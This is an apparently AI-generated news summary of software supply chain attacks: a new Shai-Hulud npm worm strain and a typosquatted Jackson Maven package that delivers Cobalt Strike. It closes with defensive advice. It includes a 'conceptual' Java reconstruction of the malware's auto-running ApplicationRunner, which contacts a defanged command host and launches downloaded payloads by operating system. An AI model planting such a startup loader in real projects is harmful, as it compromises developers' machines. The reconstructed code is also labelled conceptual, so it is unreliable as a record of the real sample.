New Shai-Hulud Strain and Fake Jackson Package Target Developers
These articles are AI-generated summaries. Please check the original sources for full details.
Supply Chain Attacks Continue with Shai-Hulud and Jackson Variants
A new strain of the Shai-Hulud worm was detected on the npm registry on December 28, 2025, and a fake Jackson Maven package was found delivering Cobalt Strike beacons, demonstrating the persistent threat to open-source software dependencies. The npm package, “@vietmoney/react-big-calendar,” has been downloaded 698 times, indicating a potential for widespread compromise.
Why This Matters
Software supply chain attacks represent a critical vulnerability, as compromised dependencies can impact countless downstream users. Ideal software development models assume trust in package repositories, but attackers actively exploit this trust to inject malicious code. The potential scale of compromise is enormous; a single successful attack can affect thousands of projects and organizations, resulting in significant financial and reputational damage.
Key Insights
- Shai-Hulud Initial Discovery: The original Shai-Hulud attack surfaced in September 2025, targeting API keys and cloud credentials.
- Package Typosquatting: Attackers leverage subtle differences in package names (e.g.,
org.fasterxml.jackson.corevs.com.fasterxml.jackson.core) to deceive developers. - Cobalt Strike as Payload: The malicious Jackson package delivers Cobalt Strike, a legitimate penetration testing tool repurposed for malicious post-exploitation activities.
Working Example
// Example of how the malicious Jackson package operates within a Spring Boot application
// (Conceptual - based on the article's description)
// The malware's ApplicationRunner is invoked automatically after the application context loads
// No explicit calls required.
public class ApplicationRunner implements org.springframework.boot.ApplicationRunner {
@Override
public void run(org.springframework.boot.ApplicationArguments args) throws java.lang.Exception {
// Check for the presence of ".idea.pid" to avoid multiple instances
java.io.File pidFile = new java.io.File(".idea.pid");
if (pidFile.exists()) {
System.out.println("Another instance running. Exiting.");
return;
}
// Contact external server to fetch payload URL
String serverAddress = "m.fasterxml[.]org:51211";
// ... (code to establish connection and retrieve encrypted payload URL) ...
// Download and execute payload based on OS
String os = System.getProperty("os.name").toLowerCase();
String payloadUrl = "..."; // Retrieved from server
// ... (code to download payload) ...
if (os.contains("win")) {
// Execute svchosts.exe
Runtime.getRuntime().exec("cmd /c start svchosts.exe");
} else if (os.contains("mac")) {
// Execute update
Runtime.getRuntime().exec("./update");
}
}
}Practical Applications
- GitHub: Organizations should enforce strict dependency review policies and utilize tools like Dependabot to identify and mitigate vulnerabilities in dependencies.
- Pitfall: Relying solely on automated dependency updates without manual review can inadvertently introduce malicious packages into a project.
Continue reading
Next article
Sunken Ships: Learning From Ivanti EPMM Attacks
Related Content
Malicious Packages Steal Developer Data via VS Code, Go, npm, and Rust
Researchers discovered malicious packages in VS Code extensions and Go, npm, and Rust ecosystems, resulting in the theft of sensitive developer data.
Malicious npm Package 'lotusbail' Steals WhatsApp Data and Credentials
A fake WhatsApp API package on npm, downloaded over 56,000 times, intercepted messages, stole credentials, and linked attacker devices.
27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials
Researchers identified 27 malicious npm packages used over five months to host phishing pages, resulting in credential theft from targeted organizations.